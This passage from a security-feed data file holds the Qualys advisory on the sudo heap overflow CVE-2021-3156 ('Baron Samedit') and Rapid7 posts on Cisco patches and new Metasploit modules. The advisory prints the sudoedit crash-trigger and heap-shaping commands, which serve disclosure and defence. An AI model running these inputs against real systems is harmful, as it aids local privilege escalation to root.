Other operating systems and distributions are also likely to be exploitable.\n\nAs soon as the Qualys research team confirmed the vulnerability, Qualys engaged in responsible vulnerability disclosure and coordinated with sudo\u2019s author and open source distributions to announce the vulnerability.\n\n### Disclosure Timeline\n\n * 2021-01-13: Advisory sent to Todd.Miller@sudo\n * 2021-01-19: Advisory and patches sent to distros@openwall\n * 2021-01-26: Coordinated Release Date (6:00 PM UTC)\n\n### Proof of Concept Video \n\n### Technical Details\n\nIf Sudo is executed to run a command in "shell" mode (shell -c command):\n\n * either through the -s option, which sets Sudo's MODE_SHELL flag; OR\n * through the -i option, which sets Sudo's MODE_SHELL and MODE_LOGIN_SHELL flags; then, at the beginning of Sudo's main(), parse_args() rewrites argv (lines 609-617), by concatenating all command-line arguments (lines 587-595) and by escaping all meta-characters with backslashes (lines 590-591):\n \n \n -------------------------------------------------------------------- \n 571 if (ISSET(mode, MODE_RUN) && ISSET(flags, MODE_SHELL)) { \n 572 char **av, *cmnd = NULL; \n 573 int ac = 1; \n ... \n 581 cmnd = dst = reallocarray(NULL, cmnd_size, 2); \n ... \n 587 for (av = argv; *av != NULL; av++) { \n 588 for (src = *av; *src != '\\0'; src++) { \n 589 /* quote potential meta characters */ \n 590 if (!isalnum((unsigned char)*src) && *src != '_' && *src != '-' && *src != '$') \n 591 *dst++ = '\\\\'; \n 592 *dst++ = *src; \n 593 } \n 594 *dst++ = ' '; \n 595 } \n ... \n 600 ac += 2; /* -c cmnd */ \n ... \n 603 av = reallocarray(NULL, ac + 1, sizeof(char *)); \n ... 
\n 609 av[0] = (char *)user_details.shell; /* plugin may override shell */ \n 610 if (cmnd != NULL) { \n 611 av[1] = \"-c\"; \n 612 av[2] = cmnd; \n 613 } \n 614 av[ac] = NULL; \n 615 \n 616 argv = av; \n 617 argc = ac; \n 618 } \n --------------------------------------------------------------------- \n\nLater, in sudoers_policy_main(), set_cmnd() concatenates the command-line arguments into a heap-based buffer "user_args" (lines 864-871) and unescapes the meta-characters (lines 866-867), "for sudoers matching and logging purposes":\n \n \n -------------------------------------------------------------- \n 819 if (sudo_mode & (MODE_RUN | MODE_EDIT | MODE_CHECK)) { \n ... \n 852 for (size = 0, av = NewArgv + 1; *av; av++) \n 853 size += strlen(*av) + 1; \n 854 if (size == 0 || (user_args = malloc(size)) == NULL) { \n ... \n 857 } \n 858 if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) { \n ... \n 864 for (to = user_args, av = NewArgv + 1; (from = *av); av++) { \n 865 while (*from) { \n 866 if (from[0] == '\\\\' && !isspace((unsigned char)from[1])) \n 867 from++; \n 868 *to++ = *from++; \n 869 } \n 870 *to++ = ' '; \n 871 } \n ... \n 884 } \n ... 
\n 886 } \n --------------------------------------------------------------------- \n\nUnfortunately, if a command-line argument ends with a single backslash character, then:\n\n * at line 866, "from[0]" is the backslash character, and "from[1]" is the argument's null terminator (i.e., not a space character);\n * at line 867, "from" is incremented and points to the null terminator;\n * at line 868, the null terminator is copied to the "user_args" buffer, and "from" is incremented again and points to the first character after the null terminator (i.e., out of the argument's bounds);\n * the "while" loop at lines 865-869 reads and copies out-of-bounds characters to the "user_args" buffer.\n\nIn other words, set_cmnd() is vulnerable to a heap-based buffer overflow, because the out-of-bounds characters that are copied to the "user_args" buffer were not included in its size (calculated at lines 852-853).\n\nIn theory, however, no command-line argument can end with a single backslash character: if MODE_SHELL or MODE_LOGIN_SHELL is set (line 858, a necessary condition for reaching the vulnerable code), then MODE_SHELL is set (line 571) and parse_args() already escaped all meta-characters, including backslashes (i.e., it escaped every single backslash with a second backslash).\n\nIn practice, however, the vulnerable code in set_cmnd() and the escape code in parse_args() are surrounded by slightly different conditions:\n \n \n --------------------------------------------------------------------- \n 819 if (sudo_mode & (MODE_RUN | MODE_EDIT | MODE_CHECK)) { \n ... 
\n 858 if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) { \n --------------------------------------------------------------------- \n\nversus:\n \n \n --------------------------------------------------------------------- \n 571 if (ISSET(mode, MODE_RUN) && ISSET(flags, MODE_SHELL)) { \n --------------------------------------------------------------------- \n\nOur question is: can we set MODE_SHELL and either MODE_EDIT or MODE_CHECK (to reach the vulnerable code) but not the default MODE_RUN (to avoid the escape code)?\n\nThe answer, it seems, is no: if we set MODE_EDIT (-e option, line 361) or MODE_CHECK (-l option, lines 423 and 519), then parse_args() removes MODE_SHELL from the "valid_flags" (lines 363 and 424) and exits with an error if we specify an invalid flag such as MODE_SHELL (lines 532-533):\n \n \n --------------------------------------------------------------------- \n 358 case 'e': \n ... \n 361 mode = MODE_EDIT; \n 362 sudo_settings[ARG_SUDOEDIT].value = \"true\"; \n 363 valid_flags = MODE_NONINTERACTIVE; \n 364 break; \n ... \n 416 case 'l': \n ... \n 423 mode = MODE_LIST; \n 424 valid_flags = MODE_NONINTERACTIVE|MODE_LONG_LIST; \n 425 break; \n ... \n 518 if (argc > 0 && mode == MODE_LIST) \n 519 mode = MODE_CHECK; \n ... \n 532 if ((flags & valid_flags) != flags) \n 533 usage(1); \n --------------------------------------------------------------------- \n\nBut we found a loophole: if we execute Sudo as "sudoedit" instead of "sudo", then parse_args() automatically sets MODE_EDIT (line 270) but does not reset "valid_flags", and the "valid_flags" include MODE_SHELL by default (lines 127 and 249):\n \n \n --------------------------------------------------------------------- \n 127 #define DEFAULT_VALID_FLAGS (MODE_BACKGROUND|MODE_PRESERVE_ENV|MODE_RESET_HOME|MODE_LOGIN_SHELL|MODE_NONINTERACTIVE|MODE_SHELL) \n ... \n 249 int valid_flags = DEFAULT_VALID_FLAGS; \n ... 
\n 267 proglen = strlen(progname); \n 268 if (proglen > 4 && strcmp(progname + proglen - 4, \"edit\") == 0) { \n 269 progname = \"sudoedit\"; \n 270 mode = MODE_EDIT; \n 271 sudo_settings[ARG_SUDOEDIT].value = \"true\"; \n 272 } \n ------------------------------------------------------------------------ \n\nConsequently, if we execute "sudoedit -s", then we set both MODE_EDIT and MODE_SHELL (but not MODE_RUN), we avoid the escape code, reach the vulnerable code, and overflow the heap-based buffer "user_args" through a command-line argument that ends with a single backslash character:\n \n \n --------------------------------------------------------------------- \n sudoedit -s '\\' `perl -e 'print \"A\" x 65536'` \n malloc(): corrupted top size \n Aborted (core dumped) \n ---------------------------------------------------------------------\n\nFrom an attacker's point of view, this buffer overflow is ideal due to the following reasons:\n\n1) The attacker controls the size of the "user_args" buffer that can be overflowed (the size of our concatenated command-line arguments, at lines 852-854);\n\n2) The attacker independently controls the size and contents of the overflow itself (our last command-line argument is conveniently followed by our first environment variables, which are not included in the size calculation at lines 852-853);\n\n3) The attacker can even write null bytes to the buffer that was overflowed (every command-line argument or environment variable that ends with a single backslash writes a null byte to "user_args", at lines 866-868).\n\nFor example, on an amd64 Linux, the following command allocates a 24-byte "user_args" buffer (a 32-byte heap chunk) and overwrites the next chunk's size field with "A=a\\0B=b\\0" (0x00623d4200613d41), its fd field with "C=c\\0D=d\\0" (0x00643d4400633d43), and its bk field with "E=e\\0F=f\\0" (0x00663d4600653d45):\n \n \n --------------------------------------------------------------------- \n env -i 'AA=a\\' 'B=b\\' 'C=c\\' 
'D=d\\' 'E=e\\' 'F=f' sudoedit -s '1234567890123456789012\\' \n --------------------------------------------------------------------- \n \n --|--------+--------+--------+--------|--------+--------+--------+--------+-- \n | | |12345678|90123456|789012.A|A=a.B=b.|C=c.D=d.|E=e.F=f.| \n --|--------+--------+--------+--------|--------+--------+--------+--------+-- \n \n size <---- user_args buffer ----> size fd bk \n\n### Solution\n\nGiven the breadth of the attack surface for this vulnerability, Qualys recommends users apply patches for this vulnerability immediately. \n\nQualys customers can search the vulnerability knowledgebase for CVE-2021-3156 to identify all the QIDs and assets vulnerable to this vulnerability.\n\nIf you are not a customer, start your free [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to get full access to the QIDs (detections) for CVE-2021-3156, so you can identify your vulnerable assets.\n\n### Qualys Coverage\n\nQualys is releasing the QIDs in the table below as they become available, starting with vulnsigs version VULNSIGS-2.5.90-4 and Linux Cloud Agent manifest version lx_manifest-2.5.90.4-3.\n\n**QID** | **Title** | **O/S** | **Advisory** | **Version*** \n---|---|---|---|--- \n352207 | Amazon Linux Security Advisory for sudo: ALAS2-2021-1590 (Baron Samedit) | Amazon Linux | [ALAS2-2021-1590](<https://alas.aws.amazon.com/AL2/ALAS-2021-1590.html>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n352208 | Amazon Linux Security Advisory for sudo: ALAS-2021-1478 (Baron Samedit) | Amazon Linux | [ALAS-2021-1478](<https://alas.aws.amazon.com/ALAS-2021-1478.html>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n174570 | SUSE Enterprise Linux Security Update for sudo (SUSE-SU-2021:0226-1) (Baron Samedit) | SUSE Enterprise Linux | [SUSE-SU-2021:0226-1](<https://lists.suse.com/pipermail/sle-security-updates/2021-January/008249.html>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n174571 | SUSE Enterprise Linux Security Update for sudo (SUSE-SU-2021:0227-1) (Baron 
Samedit) | SUSE Enterprise Linux | [SUSE-SU-2021:0227-1](<https://lists.suse.com/pipermail/sle-security-updates/2021-January/008250.html>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n174572 | SUSE Enterprise Linux Security Update for sudo (SUSE-SU-2021:0225-1) (Baron Samedit) | SUSE Enterprise Linux | [SUSE-SU-2021:0225-1](<https://lists.suse.com/pipermail/sle-security-updates/2021-January/008251.html>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n178379 | Debian Security Update for sudo (DSA 4839-1) (Baron Samedit) | Debian | [DSA 4839-1](<https://lists.debian.org/debian-security-announce/2021/msg00020.html>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n198231 | Ubuntu Security Notification for Sudo Vulnerabilities : USN-4705-1(Baron Samedit) | Ubuntu | [USN-4705-1](<https://usn.ubuntu.com/4705-1/>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n374915 | Gentoo Linux Sudo Multiple Vulnerabilities (GLSA 202101-33) (Baron Samedit) | Gentoo | [GLSA 202101-33](<https://security.gentoo.org/glsa/202101-33>) | VULNSIGS-2.5.94-2 / 2.5.94.4-3 \n158992 | Oracle Enterprise Linux Security Update for sudo (ELSA-2021-0221)(Baron Samedit) | Oracle Enterprise Linux | [ELSA-2021-0221](<https://linux.oracle.com/errata/ELSA-2021-0221.html>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n158993 | Oracle Enterprise Linux Security Update for sudo (ELSA-2021-0218)(Baron Samedit) | Oracle Enterprise Linux | [ELSA-2021-0218](<https://linux.oracle.com/errata/ELSA-2021-0218.html>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n158994 | Oracle Enterprise Linux Security Update for sudo (ELSA-2021-9019)(Baron Samedit) | Oracle Enterprise Linux | [ELSA-2021-9019](<https://linux.oracle.com/errata/ELSA-2021-9019.html>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n178383 | Debian Security Update for sudo (DLA 2534-1) (Baron Samedit) | Debian | [DLA 2534-1](<https://lists.debian.org/debian-lts-announce/2021/01/msg00022.html>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n239026 | Red Hat Update for sudo (RHSA-2021:0218) (Baron Samedit) | Red Hat | 
[RHSA-2021:0218](<https://access.redhat.com/errata/RHSA-2021:0218?language=en>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n239027 | Red Hat Update for sudo (RHSA-2021:0219) (Baron Samedit) | Red Hat | [RHSA-2021:0219](<https://access.redhat.com/errata/RHSA-2021:0219?language=en>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n239028 | Red Hat Update for sudo (RHSA-2021:0220) (Baron Samedit) | Red Hat | [RHSA-2021:0220](<https://access.redhat.com/errata/RHSA-2021:0220?language=en>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n239029 | Red Hat Update for sudo (RHSA-2021:0221) (Baron Samedit) | Red Hat | [RHSA-2021:0221](<https://access.redhat.com/errata/RHSA-2021:0221?language=en>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n239030 | Red Hat Update for sudo (RHSA-2021:0222) (Baron Samedit) | Red Hat | [RHSA-2021:0222](<https://access.redhat.com/errata/RHSA-2021:0222?language=en>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n239031 | Red Hat Update for sudo (RHSA-2021:0223) (Baron Samedit) | Red Hat | [RHSA-2021:0223](<https://access.redhat.com/errata/RHSA-2021:0223?language=en>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n239032 | Red Hat Update for sudo (RHSA-2021:0227) (Baron Samedit) | Red Hat | [RHSA-2021:0227](<https://access.redhat.com/errata/RHSA-2021:0227?language=en>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n257056 | CentOS Security Update for sudo Security Update (CESA-2021:0221) (Baron Samedit) | CentOS | [CESA-2021:0221](<https://lists.centos.org/pipermail/centos-announce/2021-January/048252.html>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n280866 | Fedora Security Update for sudo (FEDORA-2021-8840cbdccd) (Baron Samedit) | Fedora | [FEDORA-2021-8840cbdccd](<https://bodhi.fedoraproject.org/updates/FEDORA-2021-8840cbdccd>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n280868 | Fedora Security Update for sudo (FEDORA-2021-2cb63d912a) (Baron Samedit) | Fedora | [FEDORA-2021-2cb63d912a](<https://bodhi.fedoraproject.org/updates/FEDORA-2021-2cb63d912a>) | VULNSIGS-2.5.94-4 / 2.5.94.4-3 \n352217 | Amazon Linux Security Advisory for sudo: 
AL2012-2021-335 (Baron Samedit) | Amazon Linux | AL2012-2021-335 | VULNSIGS-2.5.95-2 / 2.5.95.2-1 \n374891 | Sudo Heap-based Buffer Overflow Vulnerability (Baron Samedit) | Local | [Sudo Security Alerts](<https://www.sudo.ws/alerts/unescape_overflow.html>) | VULNSIGS-2.5.90-4 / 2.5.90.4-3 \n \n* Version is the signature version followed by the Linux manifest version.\n\n### Dashboard\n\nWith VMDR Dashboard, you can track this vulnerability, its impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities' trends in your environment using the \u201cBaron Samedit | Heap-based buffer overflow Sudo\u201d Dashboard.\n\nView and download [the Baron Samedit dashboard](<https://qualys-secure.force.com/customer/s/article/000006518>).\n\n### Vendor References\n\n * [Baron Samedit Security Advisory](<https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt>) ([All Qualys Security Advisories](<https://www.qualys.com/research/security-advisories/>))\n * [Sudo Alert for Baron Samedit](<https://www.sudo.ws/alerts/unescape_overflow.html>) ([All Sudo Security Alerts](<https://www.sudo.ws/security.html>))\n\n### Frequently Asked Questions (FAQs)\n\n###### What versions are vulnerable?\n\nThe following versions of sudo are vulnerable:\n\n * All legacy versions from 1.8.2 to 1.8.31p2\n * All stable versions from 1.9.0 to 1.9.5p1\n\n###### How can I test if I have a vulnerable version?\n\nTo test whether a system is vulnerable, log in to the system as a non-root user.\n\nRun the command "sudoedit -s /".\n\nIf the system is vulnerable, it will respond with an error that starts with "sudoedit:".\n\nIf the system is patched, it will respond with an error that starts with "usage:".\n\n###### Are versions before 1.8.2 vulnerable?\n\nNo. See the explanation above.\n\n###### I'm running a vulnerable version of sudo from the list mentioned above. 
Why does the test show my host is not vulnerable?\n\nOperating system vendors don't always update the software's version number after introducing a patch to the software, particularly when they backport the patch. For example, Ubuntu released a patch (USN-4705-1) for Ubuntu 20.04, but the patched version is still 1.8.31 after the patch is installed.\n\n###### Why am I seeing multiple QIDs for the same CVE-2021-3156 on the same host?\n\nQualys released a generic QID at the time of release which detected the vulnerability based on the output of the command `sudoedit`. Later on, as OS vendors released patches, we released QIDs based on package versions as well. So, it is possible for a vulnerable asset to have the vulnerability reported both for QID 374891 and for the OS-specific checks that were released later on.\n\n###### What are the possible reasons for QID 374891 not triggering against vulnerable systems?\n\nQID 374891 was released with vulnsigs version VULNSIGS-2.5.90-4 and Linux Cloud Agent manifest version lx_manifest-2.5.90.4-3. For the vulnerability to be reported, these signature and manifest versions need to be available on the platform (the deployment schedule varies), and agents need to have completed a scan with the latest versions of the signatures.\n\nAlso, Qualys released more QIDs based on the security advisories and patches released by various Linux distributions, so certain Linux distributions had coverage before the rest. For example, the Amazon Linux security advisory was released first, and the CentOS advisories and patches were released a couple of days later. Support for CentOS Linux was added in later versions of the vulnsigs and manifests. See the table above for details.\n\n###### For CVE-2021-3156, what is the difference in the detection logic between QID 374891 and the rest of the QIDs?\n\nQID 374891 attempts to confirm the vulnerability based on the output of the command `sudoedit`. 
The rest of the QIDs confirm the vulnerability by comparing package versions against the versions disclosed by the OS vendor in their respective security advisories.\n\n###### Is a local user required to exploit the vulnerability?\n\nYes. However, this user does not need to be a privileged user or be a part of the sudoers list. For example, even the account \u2018nobody\u2019 can exploit the issue.\n\n###### Why name the vulnerability \u201cBaron Samedit\u201d?\n\nIt\u2019s a play on Baron Samedi and sudoedit.\n\n###### Will Qualys Research Team publish exploit code for this vulnerability? \n\nNo.", "modified": "2021-01-26T18:09:09", "published": "2021-01-26T18:09:09", "id": "QUALYSBLOG:A341C9278C6DD389E0F263AE83CB5579", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-02-05T01:46:45", "bulletinFamily": "info", "cvelist": ["CVE-2021-3156"], "description": "\n\nWhile [Punxsutawney Phil may have said we only have six more weeks of winter](<https://www.groundhog.org/>), the need to patch software and hardware weaknesses will, unfortunately, never end.\n\nCisco has released security updates to address vulnerabilities in most of their product portfolio, some of which may be exploited to gain full system/device control on certain devices, and one fixes the [recently disclosed sudo input validation vulnerability](<https://www.sudo.ws/alerts/unescape_overflow.html>). 
We discuss this vulnerability below, but there are many more lower-severity, or \u201cvalid administrator credentials-required\u201d bugs on the Cisco [Security Advisories page](<https://tools.cisco.com/security/center/publicationListing.x>) that all organizations who use Cisco products should review.\n\n## Getting back to RBAC\n\n\n\nThe \u201csudo\u201d advisory is officially presented as \u201c[Sudo Privilege Escalation Vulnerability Affecting Cisco Products: January 2021](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM>)\u201d and affects pretty much every Cisco product that has a command line interface. It is a fix for the ubiquitous [CVE-2021-3156](<https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit>) general `sudo` weakness.\n\nAccording to the advisory, the vulnerability is due to \u201cimproper parsing of command line parameters that may result in a heap-based buffer overflow. An attacker could exploit this vulnerability by accessing a Unix shell on an affected device and then invoking the `sudoedit` command with crafted parameters or by executing a binary exploit.\u201d\n\nAll commands invoked after exploiting this vulnerability will have `root` privileges.\n\nThis weakness will also enable lower-privileged users with access to Cisco devices to elevate their privileges, meaning you _technically_ are out of compliance with any role-based access control requirement (which is in virtually every modern cybersecurity compliance framework).\n\nRapid7 strongly advises organizations to patch this weakness as soon as possible to stop attackers and curious users from taking control of your network, as well as ensuring you are able to continue checking \u2705 this particular compliance box. 
Even though we mentioned it at the top of the post, don\u2019t forget to check out the rest of [the Cisco security advisories](<https://tools.cisco.com/security/center/publicationListing.x>) to see whether you need to address weaknesses in any of your other Cisco devices.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "modified": "2021-02-04T21:04:49", "published": "2021-02-04T21:04:49", "id": "RAPID7BLOG:B7BFF90DF2218C3CFB5ABB1CFE63700E", "href": "https://blog.rapid7.com/2021/02/04/cisco-patches-recently-disclosed-sudo-vulnerability-cve-2021-3156-in-multiple-products/", "type": "rapid7blog", "title": "Cisco Patches Recently Disclosed \"sudo\" Vulnerability (CVE-2021-3156) in Multiple Products", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-05T20:48:49", "bulletinFamily": "info", "cvelist": ["CVE-2021-3156"], "description": "## Baron Samedit is coming to get you\n\n\n\nLast week, a critical [bug](<https://www.sudo.ws/alerts/unescape_overflow.html>) in `sudo` came out and could potentially affect most of the Linux-based operating systems, since this tool is usually installed by default. This vulnerability is identified as [CVE-2021-3156](<https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit?referrer=blog#rapid7-analysis>), but better known as "Baron Samedit", and is sitting there in the code since July 2011, ready to guide you to the underworld. It affects [legacy](<https://www.sudo.ws/legacy.html>) versions from 1.8.2 to 1.8.31p2 and [stable](<https://www.sudo.ws/stable.html>) versions from 1.9.0 to 1.9.5p1. If you have not done it already, **patch now!**\n\nThis week, our own [Spencer McIntyre](<https://github.com/zeroSteiner>) added a new [module](<https://github.com/rapid7/metasploit-framework/pull/14715>) that leverages this vulnerability to gain root privileges from any local user without using a password. 
This exploit is based on the [blasty](<https://github.com/blasty>) [PoC](<https://github.com/blasty/CVE-2021-3156/blob/main/hax.c>). It requires specific offsets to succeed, and currently has targets for Ubuntu 20.04 and 18.0[1-4]. We would like to extend that target list, and help from our awesome community would be greatly appreciated!\n\n## OneDrive to rule them all\n\nContributor [@stufus](<https://github.com/stufus>) added a very useful [module](<https://github.com/rapid7/metasploit-framework/pull/14593>) that enumerates the Microsoft 365 Sharepoint/OneDrive endpoints on a target Windows system. This allows access to information related to sites that are being synchronised by the OneDrive application. This module will be very useful to get sensitive and extra information during a pentest engagement.\n\n## New Modules (3)\n\n * [Abandoned Cart for WooCommerce SQLi Scanner](<https://github.com/rapid7/metasploit-framework/pull/14578>) by WPDeeply and h00die: This adds an auxiliary module that retrieves Wordpress user names and password hashes by leveraging an unauthenticated SQL injection vulnerability within the WooCommerce Abandoned Cart plugin for versions below 5.8.2.\n * [Sudo Heap-Based Buffer Overflow](<https://github.com/rapid7/metasploit-framework/pull/14715>) by Alexander Krog, Qualys, Spencer McIntyre, blasty, and bwatters-r7, which exploits [CVE-2021-3156](<https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit?referrer=blog>): This adds an initial exploit for CVE-2021-3156 which is a heap-based buffer overflow in the sudo utility which came out recently.\n * [OneDrive Sync Provider Enumeration Module](<https://github.com/rapid7/metasploit-framework/pull/14593>) by Stuart Morgan: A new module, `post/windows/gather/enum_onedrive.rb`, has been added which allows users to enumerate information relating to all of the sites (including teamsites) which OneDrive is configured to synchronize for a target host.\n\n## Enhancements and features\n\n 
* [#14713](<https://github.com/rapid7/metasploit-framework/pull/14713>) from [yogeshwarram](<https://github.com/yogeshwarram>) adds documentation for the `auxiliary/scanner/redis/redis_login` module.\n\n## Bugs Fixed\n\n * [#14680](<https://github.com/rapid7/metasploit-framework/pull/14680>) from [digininja](<https://github.com/digininja>) prevents `exploit/windows/winrm/winrm_script_exec` printing `nil` when no command output is returned.\n * [#14684](<https://github.com/rapid7/metasploit-framework/pull/14684>) from [adfoster-r7](<https://github.com/adfoster-r7>) adds formatted logging to external python modules.\n * [#14690](<https://github.com/rapid7/metasploit-framework/pull/14690>) from [timwr](<https://github.com/timwr>) updates the Mettle payloads gem to 1.0.6, which [includes a fix](<https://github.com/rapid7/mettle/pull/207>) for a segmentation fault leading to the Meterpreter session crashing.\n * [#14693](<https://github.com/rapid7/metasploit-framework/pull/14693>) from [dwelch-r7](<https://github.com/dwelch-r7>) fixes a regression error introduced in Metasploit 6.0.27 which caused the vhost header to not be correctly set for http modules\n * [#14719](<https://github.com/rapid7/metasploit-framework/pull/14719>) from [acammack-r7](<https://github.com/acammack-r7>) pivoted connections are now much less likely to close early when there is still data pending to be read or written\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.28...6.0.29](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-01-28T13%3A25%3A20-06%3A00..2021-02-04T11%3A13%3A25-06%3A00%22>)\n * [Full diff 6.0.28...6.0.29](<https://github.com/rapid7/metasploit-framework/compare/6.0.28...6.0.29>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) 
(master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-02-05T19:30:43", "published": "2021-02-05T19:30:43", "id": "RAPID7BLOG:BCCD03F6B72FD7F9410FC063D6F16682", "href": "https://blog.rapid7.com/2021/02/05/metasploit-wrap-up-97/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-12T20:56:10", "bulletinFamily": "info", "cvelist": ["CVE-2020-11853", "CVE-2020-16875", "CVE-2020-17132", "CVE-2021-3156"], "description": "## MicroFocus? More like MacroVuln\n\n\n\nMicroFocus\u2019s Operations Bridge Manager is a security information and event management (SIEM) tool designed to collect and parse security logs from multiple disparate sources. OBM has a large attack surface\u2014something [Pedro Ribeiro](<https://github.com/pedrib>) was able to take advantage of with his new [RCE module](<https://github.com/rapid7/metasploit-framework/pull/14671>). This module leverages a Java deserialization bug to allow payload execution as either root or SYSTEM, depending on the victim OS.\n\nWe've one other OBM module currently in the process of being landed, but for anyone who needs their fix of MicroFocus hacks right away, we'd recommend pedrib\u2019s [super detailed writeup](<https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md>) of his findings.\n\n## Patches? 
We don't need no stinkin' patches!\n\nWhile [PR #14607](<https://github.com/rapid7/metasploit-framework/pull/14607>) doesn\u2019t add a totally new exploit for Microsoft Exchange Server, that's only because [zeroSteiner](<https://github.com/zeroSteiner>) was able to update an earlier module to support a bypass for the patch that was _supposed_ to fix the vuln it exploited.\n\n[CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875?referrer=blog>) originally allowed remote attackers to execute arbitrary code on affected installations of Microsoft Exchange Server so long as they were authenticated as a user who had an active mailbox and who was assigned the `Data Loss Prevention` role. This was believed to have been patched in the [Exchange Server 2016 Cumulative Update 18](<https://support.microsoft.com/en-us/topic/cumulative-update-18-for-exchange-server-2016-c1af0ead-3bde-e4db-5f24-9f597050dcbf>) (September 15 2020) and [Exchange Server 2019 Cumulative Update 7](<https://support.microsoft.com/en-us/topic/cumulative-update-7-for-exchange-server-2019-b763863a-8a2f-9eb9-f3cc-4c4098e0e413>) (September 15 2020). However, this patch was later bypassed and assigned [CVE-2020-17132](<https://attackerkb.com/topics/sfBIO5A6Cl/cve-2020-17132?referrer=blog>). Microsoft\u2019s second patch was also later bypassed\u2014a tough shake for organizations\u2019 patch cycles. 
Both the [original vulnerability](<https://srcincite.io/advisories/src-2020-0019/>) and [the patch bypass](<https://srcincite.io/advisories/src-2020-0032/>) were discovered by [Steven Seeley](<https://twitter.com/steventseeley/status/1349058761370071041>), and the Metasploit code is based on his work.\n\nzeroSteiner's changes allow the `exchange_ecp_dlp_policy` module to exploit the two patched versions of Exchange Server and the unpatched server.\n\n## External modules, internal quality\n\nLast but not least, [cgranleese-r7](<https://github.com/cgranleese-r7>) has spearheaded our efforts to improve usability of [Metasploit\u2019s external modules](<https://blog.rapid7.com/2018/09/05/external-metasploit-modules-the-gift-that-keeps-on-slithering/>) by providing more informative error messages for users when they lack the required languages in their environment ([#14480](<https://github.com/rapid7/metasploit-framework/pull/14480>)). This will help avoid instances of users missing out on useful modules because they did not know that languages other than Ruby can be needed for the full Metasploit experience.\n\n> msf6 > use auxiliary/scanner/msmail/host_id \n[-] Failed to load module: LoadError Failed to execute external Go module. Please ensure you have Go installed on your environment. \nmsf6 >\n\n## New modules (1)\n\n * [Micro Focus Operations Bridge Manager Authenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14671>) by Pedro Ribeiro, which exploits ZDI-20-1327 / [CVE-2020-11853](<https://attackerkb.com/topics/KTzvjJFDS8/cve-2020-11853?referrer=blog>): This adds an exploit module that leverages an insecure Java deserialization vulnerability in multiple Micro Focus products. This allows remote code execution as the root user on Linux or the SYSTEM user on Windows. 
Initial authentication is required, but any low-privileged user can be used to successfully run this exploit.\n\n## Enhancements and features\n\n * [#14154](<https://github.com/rapid7/metasploit-framework/pull/14154>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) This ensures that all modules that previously used manual `AutoCheck` behavior now leverage the `AutoCheck` mixin instead.\n * [#14480](<https://github.com/rapid7/metasploit-framework/pull/14480>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) Improves the handling of external modules when they're missing runtime dependencies and gives the user a more useful error. It will now return which runtime language the user is missing on their environment (this has been implemented for both Python and Go).\n * [#14607](<https://github.com/rapid7/metasploit-framework/pull/14607>) from [zeroSteiner](<https://github.com/zeroSteiner>) This updates the Exchange ECP DLP Policy module exploit to leverage a new technique that bypasses the original patch. This new technique also works on unpatched versions.\n * [#14669](<https://github.com/rapid7/metasploit-framework/pull/14669>) from [jmartin-r7](<https://github.com/jmartin-r7>) Improves error message feedback when using the `auxiliary/analyze/crack_*` modules. 
